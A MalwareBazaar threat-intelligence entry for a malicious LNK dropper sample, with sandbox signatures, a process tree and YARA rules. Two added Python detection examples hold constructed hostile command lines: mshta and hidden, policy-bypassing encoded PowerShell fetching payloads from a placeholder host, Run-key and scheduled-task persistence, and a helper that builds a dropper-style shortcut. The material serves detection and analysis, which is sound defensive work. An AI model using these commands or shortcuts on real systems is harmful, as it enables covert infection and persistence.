MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown
Vendor detections: 10

SHA256 hash: 41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
SHA3-384 hash: 84f17c307b1542fe7466ad9cb4ceb019c270cee2e530a8334b42aa7e5a0119c7d033d821d436709ca104a0c7ede9eff7
SHA1 hash: 50e4d8a112e4aad2c984d22f83c80c8723f232da
MD5 hash: 37fb639a295daa760c739bc21c553406
humanhash: thirteen-failed-mirror-sodium
File name: Upbit_20240916 docx lnk
File size: 2'362 bytes
First seen: 2024-09-16 16:33:42 UTC
Last seen: 2024-09-23 11:19:10 UTC
File type: Shortcut (lnk)
MIME type: application/octet-stream
ssdeep: 48:8tWWIAyxiZV3ShPDg3wCOCAyDRa1WvRyXv3gWQAvO5z:8tWCyGtwAbWSRMvguW
TLSH: T13C41EB012BD21725D2720B3690BFD241492DBE15AB63CF5D40A8ADCD0BA0A08E877F79
Magika: lnk
Reporter: JAMESWT_WT
Tags: 64-49-14-181 lnk

Intelligence


File Origin
# of uploads: 2
# of downloads: 105
Origin country: IT
Vendor Threat Intelligence
Verdict: Malicious
Score: 96.5%
Tags: Encryption Execution Exploit Generic Network Stealth Minerva

Result
Verdict: Malicious
File Type: LNK File - Malicious
Behaviour: BlacklistAPI detected
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: lolbin masquerade mshta powershell

Result
Verdict: MALICIOUS
Details: Hidden Powershell
Detected a pivot to Powershell that utilizes commonly nefarious attributes such as '-windowstyle hidden'.

Result
Threat name: n/a
Detection: malicious
Classification: troj.expl.evad
Score: 100 / 100
Signature
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Found suspicious ZIP file
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Register Wscript In Run Key
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Wscript called in batch mode (suppress errors)
Wscript starts Powershell (via cmd or directly)
Behaviour
Behavior Graph (ID 1512054; sample: Upbit_20240916 docx lnk.lnk; start date: 16/09/2024; architecture: WINDOWS; score: 100). The graph, rendered as a process tree with the signatures that fired on each node in parentheses and network contacts after "->":

- Upbit_20240916 docx lnk.lnk (Sigma detected: Register Wscript In Run Key; Malicious sample detected (through community Yara rule); Windows shortcut file (LNK) starts blacklisted processes; 13 other signatures)
  - mshta.exe (Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Encrypted powershell cmdline option found; Bypasses PowerShell execution policy)
    - powershell.exe (Found suspicious powershell code related to unpacking or dynamic code loading; Loading BitLocker PowerShell Module) -> 64.49.14.181 ports 49715, 49719, 49729 (DIXIE-NETUS, United States)
      - conhost.exe
      - wscript.exe (Windows shortcut file (LNK) starts blacklisted processes; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found)
        - cmd.exe
          - reg.exe (Creates autostart registry keys with suspicious values (likely registry only malware); Creates an autostart registry key pointing to binary in C:\Windows)
          - conhost.exe
        - cmd.exe (Uses schtasks.exe or at.exe to add and modify task schedules)
          - conhost.exe
          - schtasks.exe
        - powershell.exe
          - conhost.exe
        - WINWORD.EXE
  - wscript.exe (Wscript starts Powershell (via cmd or directly))
    - powershell.exe (Windows shortcut file (LNK) starts blacklisted processes)
      - 2 other processes
    - powershell.exe
      - conhost.exe
  - wscript.exe
    - powershell.exe
      - 2 other processes
    - powershell.exe
      - conhost.exe
  - 4 other processes -> 127.0.0.1
    - powershell.exe
      - 2 other processes
    - powershell.exe
      - conhost.exe
    - powershell.exe
      - conhost.exe
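The execution chain in the graph (mshta.exe and wscript.exe spawning powershell.exe, then wscript.exe fanning out into cmd.exe, reg.exe and schtasks.exe for persistence) is exactly what the Sigma and sandbox signatures listed above key on. The block below is an added illustration, not Sigma, sandbox-vendor or MalwareBazaar code: it runs equivalent parent/child rules over a constructed set of Sysmon-style process-creation events that mirror that tree. The pids, file paths, registry value name and the 203.0.113.5 URL are placeholders, and the rule names are this example's own.

```python
"""Process-tree detections for the chain LNK -> mshta.exe -> powershell.exe ->
wscript.exe -> cmd.exe -> reg.exe / schtasks.exe seen in the behaviour graph.
Added example, not Sigma or sandbox code. EVENTS are constructed Sysmon-style
process-creation records; URL, paths, pids and value names are placeholders."""
import re

LOLBINS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe",
           "reg.exe", "schtasks.exe", "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def ancestry(events, pid):
    """Yield a process followed by its ancestors (child first) by walking ppid links."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)                       # guard against pid reuse forming a cycle
        yield by_pid[pid]
        pid = by_pid[pid]["ppid"]


def run_rules(events):
    """Return (rule_name, pid) pairs; each rule mirrors one signature from the page."""
    alerts = []
    for ev in events:
        chain = list(ancestry(events, ev["pid"]))
        parent = chain[1]["image"] if len(chain) > 1 else ""
        img, cl = ev["image"], ev["cmdline"]
        # Sigma "Suspicious MSHTA Child Process": an HTA host has no business spawning a shell
        if parent == "mshta.exe" and img in SHELLS:
            alerts.append(("mshta_spawns_shell", ev["pid"]))
        # "Wscript starts Powershell (via cmd or directly)": script host one or two levels up
        if img == "powershell.exe" and any(a["image"] in SCRIPT_HOSTS for a in chain[1:3]):
            alerts.append(("wscript_spawns_powershell", ev["pid"]))
        # "Wscript called in batch mode": //B suppresses script errors and prompts
        if img in SCRIPT_HOSTS and re.search(r"(?<!\S)/{1,2}b(?!\w)", cl, re.I):
            alerts.append(("wscript_batch_mode", ev["pid"]))
        # Sigma "Register Wscript In Run Key": reg.exe writing a Run value that launches a script host
        if img == "reg.exe" and re.search(r"\\CurrentVersion\\Run\b", cl, re.I) \
                and re.search(r"[wc]script", cl, re.I):
            alerts.append(("run_key_registers_wscript", ev["pid"]))
        # "Uses schtasks.exe or at.exe to add and modify task schedules", rooted in a script host
        if img == "schtasks.exe" and "/create" in cl.lower() \
                and any(a["image"] in SCRIPT_HOSTS for a in chain[1:]):
            alerts.append(("schtasks_from_script_host", ev["pid"]))
        # "Suspicious execution chain found": four or more LOLBins stacked in one ancestry
        if sum(a["image"] in LOLBINS for a in chain) >= 4:
            alerts.append(("suspicious_execution_chain", ev["pid"]))
    return alerts


# Constructed events mirroring the graph above (placeholder URL, paths and pids).
EVENTS = [
    {"pid": 1,   "ppid": 0,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 100, "ppid": 1,   "image": "mshta.exe",      "cmdline": "mshta.exe http://203.0.113.5/a.hta"},
    {"pid": 101, "ppid": 100, "image": "powershell.exe", "cmdline": "powershell.exe -w hidden -ep bypass -enc <base64 UTF-16LE script>"},
    {"pid": 102, "ppid": 101, "image": "wscript.exe",    "cmdline": r"wscript.exe //B //Nologo C:\Users\Public\update.vbs"},
    {"pid": 103, "ppid": 102, "image": "cmd.exe",        "cmdline": r'cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "wscript.exe //B C:\Users\Public\update.vbs" /f'},
    {"pid": 104, "ppid": 103, "image": "reg.exe",        "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ /d "wscript.exe //B C:\Users\Public\update.vbs" /f'},
    {"pid": 105, "ppid": 102, "image": "cmd.exe",        "cmdline": r'cmd.exe /c schtasks /create /sc minute /mo 30 /tn Update /tr "wscript.exe //B C:\Users\Public\update.vbs" /f'},
    {"pid": 106, "ppid": 105, "image": "schtasks.exe",   "cmdline": r'schtasks /create /sc minute /mo 30 /tn Update /tr "wscript.exe //B C:\Users\Public\update.vbs" /f'},
    {"pid": 107, "ppid": 102, "image": "powershell.exe", "cmdline": "powershell.exe -nop -w hidden -c Start-Sleep 5"},
    {"pid": 108, "ppid": 102, "image": "WINWORD.EXE",    "cmdline": r"WINWORD.EXE /n C:\Users\Public\Upbit_20240916.docx"},
    {"pid": 200, "ppid": 1,   "image": "powershell.exe", "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},  # benign admin script
]

if __name__ == "__main__":
    for rule, pid in run_rules(EVENTS):
        print(f"{rule:28s} pid={pid}")
```

The decoy WINWORD.EXE launch (pid 108) and the benign scheduled backup script (pid 200) trigger nothing; the chain rule fires only once four LOLBins are stacked in one ancestry, which is the depth at which the Joe-style "suspicious execution chain" verdict becomes defensible on a real estate.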

Threat name: Win32.Trojan.Pantera
Status: Malicious
First seen: 2024-09-16 16:30:51 UTC
File Type: Binary
AV detection: 6 of 38 (15.79%)
Threat level: 5/5

Result
Malware family: n/a
Score: 8/10
Tags: execution persistence
Behaviour:
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Modifies registry class
Scheduled Task/Job: Scheduled Task
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Enumerates physical storage devices
Drops file in System32 directory
Adds Run key to start application
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Blocklisted process makes network request
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Archive_in_LNK
Author: @bartblaze
Description: Identifies archive (compressed) files in shortcut (LNK) files.
Rule name: EXE_in_LNK
Author: @bartblaze
Description: Identifies executable artefacts in shortcut (LNK) files.
Rule name: MSOffice_in_LNK
Author: @bartblaze
Description: Identifies Microsoft Office artefacts in shortcut (LNK) files.
Rule name: PS_in_LNK
Author: @bartblaze
Description: Identifies PowerShell artefacts in shortcut (LNK) files.
Rule name: Script_in_LNK
Author: @bartblaze
Description: Identifies scripting artefacts in shortcut (LNK) files.
Rule name: SUSP_LNK_SuspiciousCommands
Author: Florian Roth (Nextron Systems)
Description: Detects LNK file with suspicious content
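The YARA rules above and the sandbox signatures earlier on this page (suspicious LNK command-line arguments, hidden PowerShell, encoded command, execution-policy bypass, archive or executable artefacts inside the shortcut) all key on structure in the Shell Link format: the LinkFlags and ShowCommand fields in the 76-byte header, the StringData entries holding the target and its arguments, and whatever is appended after the terminal block. The parser and triage routine below is an added example written for this entry, not code from MalwareBazaar, the rule authors or any sandbox vendor. The LNK bytes it inspects are constructed inside the block (the real Upbit_20240916 sample is not reproduced); the target path, PowerShell arguments and the 203.0.113.5 URL are placeholders, and the finding strings are this example's own.

```python
"""Parse a Windows Shell Link (.lnk) and flag the traits the page's sandbox
signatures and LNK YARA rules key on: LOLBin target, hidden/minimized window,
execution-policy bypass, encoded PowerShell command, and payloads appended
after the link structure. Added example; the LNK bytes are constructed here."""
import base64
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags, MS-SHLLINK section 2.1.1
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7        # ShowCommand value that starts the target minimized
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))
LOLBINS = {"mshta", "powershell", "pwsh", "wscript", "cscript", "cmd", "rundll32", "regsvr32", "certutil"}
MAGICS = {b"PK\x03\x04": "zip archive", b"MZ": "PE executable",
          b"\xd0\xcf\x11\xe0": "OLE (legacy Office)", b"%PDF": "PDF"}


def build_lnk(target_rel, args, show_cmd=1, trailer=b""):
    """Build a minimal LNK: header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS + TerminalBlock."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)

    def sdata(s):                 # CountCharacters followed by UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sdata(target_rel) + sdata(args) + b"\x00" * 4 + trailer


def parse_lnk(data):
    """Return LinkFlags, ShowCommand, StringData fields and the offset where the link structure ends."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_cmd = struct.unpack_from("<I", data, 60)[0]
    pos = 0x4C
    if flags & HAS_ID_LIST:                       # IDListSize + ItemIDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    strings = {}
    for bit, key in STRING_FIELDS:
        if flags & bit:
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            strings[key] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += n * width
    while pos + 4 <= len(data):                    # ExtraData blocks until a TerminalBlock (< 4)
        size = struct.unpack_from("<I", data, pos)[0]
        if size < 4:
            pos += 4
            break
        if pos + size > len(data):                 # truncated or bogus block: stop parsing here
            break
        pos += size
    return {"flags": flags, "show_command": show_cmd, "strings": strings, "end": pos}


def triage(data):
    """Findings in the spirit of the page's signatures; an empty list for an ordinary shortcut."""
    info = parse_lnk(data)
    s = info["strings"]
    target = s.get("relative_path", "").replace("\\", "/").rsplit("/", 1)[-1].lower()
    cmdline = s.get("arguments", "")
    findings = []
    if target.rsplit(".", 1)[0] in LOLBINS:
        findings.append(f"lolbin target: {target}")
    if re.search(r"-w\w*\s+h", cmdline, re.I):              # -w hidden / -WindowStyle Hidden
        findings.append("hidden window (-WindowStyle Hidden)")
    if re.search(r"-e[px]\w*\s+bypass", cmdline, re.I):     # -ep bypass / -ExecutionPolicy Bypass
        findings.append("execution policy bypass")
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if m:                                                    # -EncodedCommand carries UTF-16LE base64
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            decoded = "<not valid UTF-16LE base64>"
        findings.append(f"encoded command decodes to: {decoded}")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7 (SW_SHOWMINNOACTIVE): launches minimized")
    for magic, name in MAGICS.items():                       # Archive_in_LNK / EXE_in_LNK style check
        idx = data.find(magic, info["end"])                  # only look past the parsed structure
        if idx != -1:
            findings.append(f"embedded {name} at offset {idx}")
    return findings


# Constructed samples: a dropper-style LNK and an ordinary shortcut (203.0.113.5 is a documentation address).
STAGE2 = "$u='http://203.0.113.5/s2.hta'; mshta.exe $u"
ENC = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
MALICIOUS = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                      f"-w hidden -ep bypass -nop -enc {ENC}",
                      show_cmd=SW_SHOWMINNOACTIVE, trailer=b"PK\x03\x04" + b"\x00" * 26)
BENIGN = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\Public\notes.txt")

if __name__ == "__main__":
    for finding in triage(MALICIOUS):
        print(finding)
    print("benign:", triage(BENIGN))
```

Two caveats a practitioner would want: the embedded-payload scan deliberately starts at the end of the parsed structure, so base64 inside the arguments that happens to contain "MZ" does not produce a false hit, and the ExtraData loop stops on a block whose declared size overruns the file instead of trusting it, which is the usual way a hand-crafted LNK breaks naive parsers.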
